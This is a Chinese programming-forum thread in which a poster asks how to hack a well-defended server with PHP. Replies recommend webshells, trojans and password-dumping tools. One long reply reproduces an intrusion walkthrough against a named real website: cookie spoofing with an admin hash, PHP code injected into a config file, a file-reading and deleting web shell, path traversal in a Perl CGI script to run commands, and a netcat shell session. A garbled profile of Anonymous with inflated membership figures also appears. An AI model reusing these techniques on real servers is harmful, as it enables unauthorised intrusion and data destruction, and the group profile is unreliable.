欢迎各位兄弟 发布技术文章

这里的技术是共享的

You are here

我是一名黑客,现请教如何通过PHP代码黑掉防守严密的服务器

HaoRenNet

....你有webshell 是网站权限不是服务器,

你知道中国菜刀吗?

有webshell 可以利用虚拟终端执行cmd

用虚拟终端执行下net user 能执行的话 80%把握拿下服务器

可以执行exe的话 可以整个远控木马

如果是win2003 2008服务器没有加安全软件的话可以执行0day类的程序,也可以用getpass这个程序

还有楼主给出的明显就是html


打了这么多字真的感觉楼主你好二。。

2 反对 回复 举报2014-12-05
?
fleecy

你好,我是比尔盖茨,你拿点黑墨水把屏幕涂一下就可以黑掉对方服务器了。

6 反对 回复 举报2014-11-30
?
慕奶姨

楼主,你辛苦了,写这么多字!

2 反对 回复 举报2014-11-30
?
PHP工程师

WebShell,顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。黑客在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问这些asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载文件,查看数据库,执行任意程序命令等)。由于webshell其大多是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。

2 反对 回复 举报2014-11-30
    ?
    PHP工程师



    完全可以进行一次cookie欺骗。我们这里使用的是一种比较烦琐的方法: 
    先断开网络,将我们的IP改为20cn.org的IP,然后在%systemroot%/system32/drivers/etc/hosts文件里把www.20cn.org这个域名指向20cn.org的IP,做这一步是为了我们在断开网络的时候能够成功的将www.20cn.org解析成它的IP.最后在我们的IIS里面自建一个虚拟目录/~shuaishuai/down_sys/admin/写一个asp文件,把cookie设置为管理员的用户名和加过密的密码,asp文件内容如下: 

    <% 
    response.cookies("bymid")="adminuser" 
    response.cookies("bympwd")="596a96cc7bf91abcd896f33c44aedc8a" 
    %> 

    然后访问这个asp文件 

    http://www.20cn.org/~shuaishuai/down_sys/admin/cookie.asp 

    留着这个窗口,把IP改回为原来的192.168.0.1,接着用这个窗口请求 

    http://www.20cn.org/~shuaishuai/down_sys/admin/admin.php 

    管理界面出来了,通过了验证。接着我们来上传文件...可下面的事让我们气恼了好久,竟然没有上传文件的功能,Fiant,是一个没开发完全的半成品,彻底失望了吗?不,我们依然有信心,接着查看一下其他的文件,看看能不能对配置文件动点手脚,我们找到了一个class.php,里面保存的是下载系统的一些软件分类信息,内容看起来像这样: 

    5|安全工具|1028372222 
    8|红客工具|1034038173 
    7|其它软件|1034202097 
    .... 
    我们试着往里面写东西,于是在管理页面新添加一个主分类,分类的名称为"<?copy ($a,$b);unlink($a);?>",提交过后class.php变成了这样 

    5|安全工具|1028372222 
    8|红客工具|1034038173 
    7|其它软件|1034202097 
    9|<?copy($a,$b);unlink($a);?>|1054035604 

    这个php文件可以让我们上传文件到有权限目录和删除有权限删除的文件。于是我们在本地写了一个表单,上传一个phpshell上去,然后访问 

    http://www.20cn.org/~shuaishuai/down_sys/data/sh.php 

    GOOD,返回了phpshell的界面...一阵高兴过后,我们才发现这个phpshell什么命令都不能执行,原来网站PHP打开了safe_mode功能,限制我们执行命令。但我们已经有了很大的突破了,可以向服务器上传文件了。接下来我们利用PHP丰富的内置函数写了很多小脚本上传测试,很不幸,系统利用 disable_functions 禁止了大部分的文件系统函数、目录函数...好在并没有赶尽杀绝,最后我们写了下面一个php程序来查看一些有权限查看的目录和文件: 

    <? 
    $c = $HTTP_GET_VARS["c"]; 
    $f = $HTTP_GET_VARS["f"]; 
    if($c=="file") { 
    $file=readfile($f); 
    echo $file; 

    if($c=="dir") { 
    $h=opendir($f); 
    while($file=readdir($h)) { 
    echo "$file/n"; 


    if($c=="del") { 
    unlink($f); 

    ?> 

    在做了很多尝试过后,我们发现在PHP上不能获得新的突破,好在我们可以利用上面那个php程序来查看www.20cn.org/cgi-bin/club/scripts/ 目录中程序脚本的完整的代码,于是我们决定改向回到起点、查看CGI文件,由于没有权限向可执行CGI程序的目录里写文件, 新写一个CGI程序来执行命令是不现实的,所以决定利用现有的.pl程序来插入命令,目标自然是放在perl的open函数上,于是我们开始查找哪些程序用了open函数,但找了好多.pl文件,都没有发现,但却看到有好多readfile()函数,记得perl里面是没有这个函数的,但这里却用了很多readfile(),为什么呢?这肯定是他们自定义的一个函数,我们看到每一个.pl文件前几行都有一个use Club;原来这里有个模块,于是查看Club.pm,很快便发现了open函数. 

    sub readkey { 
    my($file)=@_; 
    unless(open(FH,"$file")) { 
    errmsg("对不起!你超时了,请<a href=/"$login_page/" target=/"_parent/">重新登陆</a>"); 
    exit; 

    unless(flock(FH,LOCK_SH)) { 
    errmsg("Can't Lock File: $file"); 

    my $data = <FH>; 
    close(FH); 
    return $data; 


    这就是那个自定义的readfile函数,证实了我们的猜想,而且也找到了一个符合要求的open函数,接着搜寻哪个文件调用了这个函数,很快我们在change_pw.pl这个程序里找到了这个函数调用,这个程序用来修改用户的密码,不幸的是代码在判断用户旧密码是否正确前就调用了 readkey() 函数: 

    my $key_info=readkey("$key_dir/$key"); 

    于是提交 

    http://www.20cn.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=22&key=../../../....

    再查看一下 

    http://www.20cn.org/cgi-bin/club/scripts/bbb 

    Yeah!成功执行了...出现了我们期望的结果,这真是太妙了,可以利用这个来执行命令,就相当于得到了一个shell。但这样办事毕竟不方便,不能及时地查看我们的运行结果。因此我们又上传了一个文件、编译、执行,然后 

    D:/temp>nc -vv www.20cn.org 12345 
    www.20cn.org [211.161.57.29] 12345 (?) open 
    id 
    uid=80(www) gid=80(www) groups=80(www) 
    uname -a 
    FreeBSD ns8.20cn.com 4.8-RELEASE FreeBSD 4.8-RELEASE #1: Wed Apr 2 07:01:40 CST 2003  root@ns8.20cn.com:/usr/obj/usr/src/sys/20CN i386 

    哦,是FreeBSD 4.8-RELEASE,版本很高,提升权限比较困难,我们找了好久都没有找到有效的local exploit,提升权限失败,只好作罢。 

    到这里,我们的hacking基本上结束了。虽然没拿到root,但至少拿到了网站WEB权限,对于我们CGI安全爱好者来说,应该算是完成了本职工作吧-)。之后我们迅速与站主联系,提醒他网站存在安全隐患,但站主并没有向我们询问细节,他自己通过分析日志修复了漏洞。 

    - 作者: httphacker 2005年01月5日, 星期三 06:09  回复(0) |  引用(0) 加入博采

    跨站Script攻击

     每当我们想到黑客的时候,黑客往往是这样一幅画像:一个孤独的人,悄悄进入别人的服务器中,进行破坏或者窃取别人的秘密资料。也许他会更改我们的主页,甚者会窃取客户的信用卡号和密码。另外,黑客还会攻击访问我们网站的客户。与此同时,我们的服务器也成了他的帮凶。微软称这种攻击为"跨站script"攻击。而这种攻击大多数都发生在网站动态产生网页的时侯,但黑客的目标并不是你的网站,而是浏览网站的客户。

    跨站script攻击的说明

      在一本名为<>的杂志中,CERT警告大家:如果服务器对客户的输入不进行有效验证,黑客就会输入一些恶意的HTML代码,当这些HTML代码输入是用于SCRIPT程序,他们就能利用它来进行破坏,如插入一些令人厌恶的图片或声音等,同时,也能干扰了客户正确浏览网页。

      我们知道,有些朋友曾经被诱导到一些可疑的免费网站,他们得到的仅仅是10到20个小的窗口,这些窗口常常伴随着由JAVA 或 JAVASCRIPT生成的失效安钮,这被称为鼠标陷阱。关闭这些窗口是徒劳的,每当我们关闭一个窗口,又会有10几个窗口弹出。这种情况常常发生在管理员没在的时侯发生。鼠标事件是黑客利用跨站SCRIPT方法攻客户的典型范例。

      恶意的标签和SCRIPT不单纯的恶作剧,他们甚至可以窃取资料和捣毁系统。一个聪明的甚至是不够聪明的黑客都能够使用SCRIPT干扰或者改变服务器数据的输入。利用SCRIPT代码也能攻击客户系统,让你的硬盘尽损。而且你要知道,在你一边使用服务器的时候,黑客的SCRIPT也正在你服务器里安全的地方运行着的呀!如果客户对你的服务器非常信认,同样他们也会信任那些恶意的SCRIPT代码。甚至这个代码是以〈SCRIPT〉或者〈OBJECT〉的形式来自黑客的服务器。

      即使使用了防火墙(SSL)也不能防止跨站SCRIPT的攻击。那是因为如果生成恶意SCRIPT代码的设备也使用了SSL,我们服务器的SSL是不能辨别出这些代码来的。我们难道就这样把客户曾经那么信任的网站拱手让给黑客吗?而且有这种破坏的存在,会让你网站名誉尽损的。

    1 反对 回复 举报2014-11-30
      ?
      PHP工程师

      上面给出的文章名称是

      入侵基于JSP+Tomcat的Web网站实录


      1 反对 回复 举报2014-11-30
        ?
        PHP工程师

        基本介绍


        webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

        webshell是web入侵的脚本攻击工具。简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。再通过dos命令或者植入后门木马通过服务器漏洞等~达到提权的目的从而旁注同服务器其他的网站~



        1 反对 回复 举报2014-11-30
        ?
        PHP工程师

        1简介



          组织名称

           

          匿名者组织,匿名者黑客组织(AnonymousHacker)

           


          组织规模      全球最大的黑客组织    

          成员人数      管理组成员300,核心成员5000,计算机精英60万,成员320万    

          创建时间      2003年于美国创建    

          创始人      无领导人    

          组织总部      纽约    

          组织类型      黑客组织,宣扬人道主义精神组织,自由组织    

          分布地区      亚洲东部,欧洲,非洲,澳洲,北美洲,南美洲    

          组织理念      Free!Equality!public!Justice!    


        查看完整回答
        1 反对 回复 举报2014-11-30
          ?
          乐乐520

          你把这个问题搞懂了,搞IT的老板都要关门啦

          1 反对 回复 举报2014-11-29
            ?
            dire

            你没说错 只是说在了不该说的地方 你应该也是一个正在学习的X客,那就沉默下去 而且年龄也不会很大 15岁以下.那就一心研究技术吧 

             反对 回复 举报2015-12-28
              ?
              有的同学

              我居然看完了

               反对 回复 举报2015-11-23
                ?
                乐乐520

                你对黑客只有些看过的理论,可实际什么都不会,我是会黑客,我也不学什么编程!IT没那说的容易。不然人人都是高手了!

                 反对 回复 举报2015-09-08
                  ?
                  msyb

                  要知道,大神们都是挂的txt黑页,那种非主流黑页根本就不装逼。

                   反对 回复 举报2015-08-20
                    ?
                    qq_久伴之人_0

                    ....................................................好腻害

                     反对 回复 举报2015-07-30
                      ?
                      灿白

                      看起来很屌的样子,不过黑掉服务器还是不要做为妙

                       反对 回复 举报2015-07-23
                        ?
                        大志idea

                        楼主用心良苦啊####

                         反对 回复 举报2015-07-05
                          ?
                          Ezre

                          。。。能不整这么多概念理论吗。。

                           反对 回复 举报2015-06-16
                            ?
                            apprentice1104

                            我读书少,不要骗我。:)

                             反对 回复 举报2015-05-19
                              ?
                              Jokdon

                              不懂这玩意

                              不过弱弱问一句,你是来显摆么?

                              困惑。

                               反对 回复 举报2015-01-18
                                ?
                                PHP工程师

                                5480b3650001caab05000412.jpg这就是我黑掉的页面

                                查看完整回答
                                 反对 回复 举报2014-12-05
                                • HaoRenNet

                                  HaoRenNet
                                  楼主蛋疼啊。。。挂个黑页了不起啊 我全球被黑统计排名第十


                                来自  https://www.imooc.com/wenda/detail/237902

                                普通分类: